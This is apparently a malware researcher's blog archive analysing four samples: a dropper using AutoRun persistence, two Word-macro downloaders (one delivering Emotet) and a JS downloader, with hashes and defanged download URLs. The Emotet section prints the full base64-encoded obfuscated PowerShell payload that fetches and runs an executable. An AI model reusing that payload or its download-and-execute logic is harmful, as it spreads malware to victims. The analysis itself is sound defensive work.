Tag Archives: Malwareblogpost

Trojan dropper bdf243b7a296f7aecc366c799e3fb865ee3aff7c72d8d942e2b2632a347fe5c3


SHA256: bdf243b7a296f7aecc366c799e3fb865ee3aff7c72d8d942e2b2632a347fe5c3

I downloaded this sample from Malshare.

I started decoding PE hex to text file and found that the PE file has embedded another file which will be dropped on execution.

blg7-wp-12

Filename: help.exe

SHA256: 837bef64239be017a2aac92852576efc7d84774d90f64e9d69c5cc3a2b4ecce4

It also drops Autoexec.bat.exe file and Autoexec.exe files at C:\ location. (But it didn’t drop these files instead it dropped AutoRun.INF and AutoRun.exe)

blg7-wp-9.PNG

blg7-wp-8.PNG

Also found computer username emartinez in path to PDB file, that means this file must be compiled on a machine under this user account.

blg7-wp-3.PNG

and username janettedoe in another path to startup programs

blg7-wp-14.PNG

I executed this PE file for dynamic analysis. I found this file dropped Helpme.exe, AutoRun.INF same location I have seen in hex code.

Files Dropped:

  1. C:\Windows\System32\HelpMe.exe
  2. C:\AutoRun.INF
  3. C:\AutoRun.exe

Screenshots

blg7-wp-23.PNG

AUTORUN.INF file at location C:\ 

AUTORUN.INF file executes executable AutoRun.exe file. (Below screenshot)

blg7-wp-27.PNG

blg7-wp-34

 

Another executable dropped at below location

C:\$Recycle.Bin\S-1-5-18

C:\$Recycle.Bin\S-1-5-21-3461203602-4096304019-2269080069-100

blg7-wp-31.PNG

blg7-wp-32

I did rename C:\$Recycle.Bin\S-1-5-18\desktop.ini file to desktop.ini.exe and double click to execute it. It has given error Cannot create file “C:\Windows\System32\HelpMe.exe 

blg7-wp-33.PNG

Then I executed desktop.ini.exe file with administrative privilege (before execute this file I had commented AutoRun.exe file at location C:\) and this file executed C:\Windows\System32\HelpMe.exe which dropped file AutoRun.exe at location C:\

blg7-wp-34

I disassembled AutoRun.exe file and found this creates file Soft.lnk which again has path to execute HelpMe.exe on windows startup.

blg7-wp-35.PNG

Below soft.lnk has comment Stone, I hate you! this file has target to execute AUTORUN.INF.exe

blg7-wp-22

No internet connectivity has been tested from this malware, as this analysis done offline.

 

Trojan downloader word macro


SHA256 – 4221a9922d97fa329b3dbb27e37522448958cbfa186a6ef722e48d63f9753808

Download link – VirusTotal

I downloaded this word document and checked whether macro present and it auto executes on opening document.

Yes, it does and it has obfuscated strings too.

blg5-05132019.PNG

I opened document and navigated to > Views > Macros > View Macros > Selected “autoopen” > Edit

blg5-05132019-3.PNG

I renamed autoopen() to autoopen2. (Which you can see in above screenshot)

blg5-05132019-4.PNG

while debugging macro, found it executed PowerShell script in obfuscated form.

blg5-05132019-5

blg5-05132019-6.PNG

After deobfuscate, below is the PowerShell script.

blg5-05132019-7.PNG

On debugging PowerShell script, it tries to download 685.exe from one of below URL’s

blg5-05132019-9.png

blg5-05132019-8.PNG

http://duanlocphatresidence%5B.%5Dcom/wp-admin/b8oyf2_w724r5u-66253
http://superwhite%5B.%5Dcom%5B.%5Dau/wp-content/2t9x_bmoau88p-89600496
http://pneumorek%5B.%5Dma/calendar/EckAzvvl
http://pure-vapedistribution%5B.%5Dbe/p52r/js74mi_zk0p5orhwa-651
http://nitincarcare%5B.%5Dcom/wp-content/BbayinbUK

and drops PE file at location C:\Users\<user>\685.exe

blg5-05132019-10.png

While debugging PowerShell script, I tried to hit the download script but found none of above URL’s has PE file.

The file is removed from all URL’s.

Below is VirusTotal score.

blg5-05132019-11.PNG

 

Word macro drops Emotet malware


SHA256 : 1043dd7647105b035acbc027e0fa448f329ea5620956a1ba82dc254fc7bd6e29

I have downloaded word document for analysis from VirusTotal

I checked file with Oletools to verify macro exist and is it auto executable.

In below screenshot, it can be seen, the macro is present and auto executable.

Blg4-30042019-4.PNG

I opened word document and Enabled Editing.

Blg4-30042019.PNG

Views > Macros > View Macros > Select Autoopen > Edit

I renamed autoopen() to autoopen2() so it will not execute on document open.

I started debugging VBA and found base64 string which executes PowerShell script to download a malicious file from remote server.

Below is the base64 string used in macro

Blg4-30042019-1.PNG

JABRAEEAQQBBAFUAVQBDAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwBHAEcAJwAsACcAQQBDACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBBAEMAJwAsACcAawBaACcAKQApADsAJAByAEcAQQBYAEEAQQBBAG8AIAA9ACAAJwA2ADAANAAnADsAJABDAEIAVQB3AHg ANABBAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWABBACcALAAnAEcAQgAnACkALAAnAFEAJwApACwAJwBvACcALAAnAHgAYwAnACkAOwAkAHYAVQBfAG8AYwAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAByAEcAQQBYAEEAQQBBAG8AKwAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAGUAeABlACcALAAnAC4AJwApADsAJABuAEMAMQBCAEMAMQA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAgACcAQgAnACwAJwBXAEEAJwAsACcAWABEAHgAJwApADsAJAB6AEEAQQBrAEIAQgA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBlAFQALgBgAFcAZQBCAGAAQwBsAEkAYABlAG4AdAA7ACQAUwBBAGsAXwBBAEIAQQA9ACgAIgB7ADEANQB9AHsAMwA5AH0AewAyADEAfQB7ADEAMQB9AHsANAA0AH0AewA0ADMAfQB7ADIANwB9AHsAMQA4AH0AewAyADQAfQB7ADQANQB9AHsAMwAxAH0AewA0ADYAfQB7ADMAOAB9AHsAMQAyAH0AewAzADUAfQB7ADIANQB9AHsAMgAzAH0AewAxADkAfQB7 ADQAfQB7ADQAMAB9AHsANAA5AH0AewA0ADcAfQB7ADEAfQB7ADQAOAB9AHsANwB9AHsAOAB9AHsAMQA3AH0AewAxADMAfQB7ADMANgB9AHsAMwA3AH0AewA1AH0AewAzADMAfQB7ADMAfQB7ADQAMQB9AHsANgB9AHsAMgB9AHsAMAB9AHsAOQB9AHsAMgA5AH0AewAxADYAfQB7ADMAMgB9AHsAMgAwAH0AewAyADIAfQB7ADQAMgB9AHsAMQAwAH0AewAyADgAfQB7ADMAMAB9AHsAMgA2AH0AewAxADQAfQB7ADMANAB9ACIAIAAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHMAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAC8ATABvACcALAAnAEsAUwAnACkAKQAsACcAawAyAC8AJwAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAcAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGEAJwAsACcAZwBlAC8AYwBzACcAKQAsACcALwAnACkALAAnAC4AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBlAHIAJwAsACcAcwBhACcAKQAsACcALgAnACkALAAnAG0AbQAnACwAJwBiAHMAJwAsACcAOgAnACwAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEAAaAB0ACcALAAnAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwByAGUAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGUAJwAsACcALwAvAHQAJwApACkALAAnAC0ASQBaACcALAAnAHQAcAAnACwAJwBnACcALAAnADAANAAnACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBwACcALAAnAGgAdAB0ACcAKQAsACcALwBiACcALAAnADoALwAnACkALAAnAGEAYwAnACwAKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBwAGgAaQAnACwAJwBrAHUAbgBwACcAKQAsACcAbwAnACwAJwByACcALAAnAC8AJwApACwAJwBTADkAWAAnACwAJwBiACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC8AUwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAZQAvAEAAJwAsACcARwAnACkAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBtAC8AJwAsACcAWABhACcALAAnAGMAbwAnACkALAAnAEsAJwAsACcAYQAnACkALAAnAGgAJwAsACcAYQAnACwAJwBfAHkASAAnACwAJwAvAC8AbAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGIAJwAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAC8AaQAnACwAJwBlAHMAdAAnACwAJwA0ACcAKQApACwAJwB4ACcALAAnAGIAaQAuACcALAAoACIAewA0AH0AewAwAH0AewAxAH0AewAzAH0AewAyAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBrAGUAZQAnACwAJwBiAHIAaQAnACkALAAnAC4AYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB0ACcALAAnAC8AYwBvAG4AJwApACwAJwBvAG0AJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAcAA6AC8AJwAsACcALwAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAYwBvAG0AJwAsACcALwAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGoALQBhACcALAAnADMAJwApACwAJwB0ACcALAAnAGkAbgBnACcALAAnAC8AJwAsACcAOgAnACwAJwByACcALAAnAGEAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAEAAaAB0ACcALAAnAC8AJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAUQAnACwAJwBzAEMASwAnACkAKQAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAcwAnACwAJwBlAHkAJwAsACcAZQBsAC4AJwApACwAJwBjAG8AbQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwAvACcALAAnAGMAbwBtACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAOgAnACwAJwB0AHQAJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwByACcALAAnAEEAbQAnACwAJwBzAGIAeQAnACkALAAnAFcAcQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAcgBqAHMAJwAsACcAagAnACkALAAnAGgARQAnACkALAAnAC8AdAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvADkASgAnACwAJwBEACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAQAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAB0AHAAJwAsACcAaAAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAZQAnACwAJwAvAGgAbwAnACkALAAnAGwAJwApACkALgAiAHMAYABwAGwAaQB0ACIAKAAnAEAAJwApADsAJABZAEEAQwBBAEEAMQBHAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAWgAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBBAEQAQQAnACwAJwBBACcAKQAsACcAaQB4ADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABpAEEAQQBRAEIAQQBBACAAaQBuACAAJABTAEEAawBfAEEAQgBBACkAewB0AHIAeQB7ACQAegBBAEEAawBCAEIALgAiAGQAbwBgAFcATgBMAE8AQQBEAGAARgBgAEkATABlACIAKAAkAGkAQQBBAFEAQgBBAEEALAAgACQAdgBVAF8AbwBjADEAKQA7ACQAYgBBADEAXwBDAEEAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAJwBRAEcAJwAsACcAQgAnACwAJwBaAEEAMQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAdgBVAF8AbwBjADEAKQAuACIATABlAGAATgBnAFQASAAiACAALQBnAGUAIAAzADUANgAwADEAKQAgAHsALgAoACcASQBuAHYAbwBrAGUALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAdgBVAF8AbwBjADEAOwAkAEMAQQBRAF8AQQBCAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwBPACcALAAnAEEAQgBEACcALAAnAEQAUQA0ACcAKQA7AGIAcgBlAGEAawA7ACQAegBHAFgAQQB4AGsARAA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwB3ACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBBAEQAWABjACcALAAnAFEAJwApACkALAAnAEEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAFEAQQAxAFgAQQBBAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAZgBBACcALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAEEAMQAnACwAJwBHAHgAJwAsACcARABBACcAKQApAA==

After decoding base64 string, I got below PowerShell script.

Blg4-30042019-2.PNG

On debugging PowerShell script, I found, it downloads 604.exe file from one of multiple sources and drop at location C:\Users\<username>\604.exe

Blg4-30042019-5.PNG

below are the URL from where it tries to download the malicious executable file.

Blg4-30042019-7.PNG

http[:]// beysel[.]com/XaaK-IZWqrsbyAmxS9X_yHrjsjhEj-a3/tQsCK/
http[:]// labersa[.]com/hotel/9JDk2/
http[:]// phikunprogramming[.]com/bs/page/css/LoKS/
http[:]// brikee[.]com/contact/SGe/
http[:]// terebi[.]com/best/i404/

I got this file at location C:\Users\<username>\604.exe

Below is 604.exe file version.

Blg4-30042019-6.PNG

Below is SHA for this executable.

SHA256 – 48260C3FFE79F8CF498502778C192A2CFCA7B69866141A9A88FA75B0D0093557

Here is [VirusTotal link]

This is executable is Emotet.

 

Trojan- JS downloader


I have downloaded JS trojan downloader from VirusSign  to analyze behavior of this malware. It was a zip file INC_0987155124US_Apr_19_2019.zip and after extracting it, I got .js file.

On opening JS file in notepad, i saw base64 obfuscated string. After obfuscation JS script, I found, this file has multiple sources/ URL’s to download  SHA256- d6798b62cef08c4f61a30dfa346faf5aa29f9d03e4599ebe5ae910a193087b86

Below are  the URL’s used in JS to download malicious executable files.

Blg3_20042019_4

Below is JS code where it goes to the URL to check whether it’s up else will check another URL to get the malware downloaded on user’s machine.

Blg3_20042019_7

I tried to accessed all four URL’s used in JS script and could able to download malicious .exe files from three of them. One URL was inaccessible.

Blg3_20042019_2.PNG

Below are executable files downloaded from URL’s.

Blg3_20042019_3

When I checked the version and hash of all three files, all were same.

Blg3_20042019_6

Behavior of executable file:

On execution, file get created under C:\Windows\SysWow64 directory under name sourcematrix.exe. 

Blg3_20042019_8

and it also adds to the windows services (services.msc).

Blg3_20042019_9.PNG

Wireshark log shows this malware executable connects to IP address 5[.]230[.]147[.]179

Blg3_20042019_12.PNG

Below is malicious executable file hash

SHA256: D6798B62CEF08C4F61A30DFA346FAF5AA29F9D03E4599EBE5AE910A193087B86

Thank you.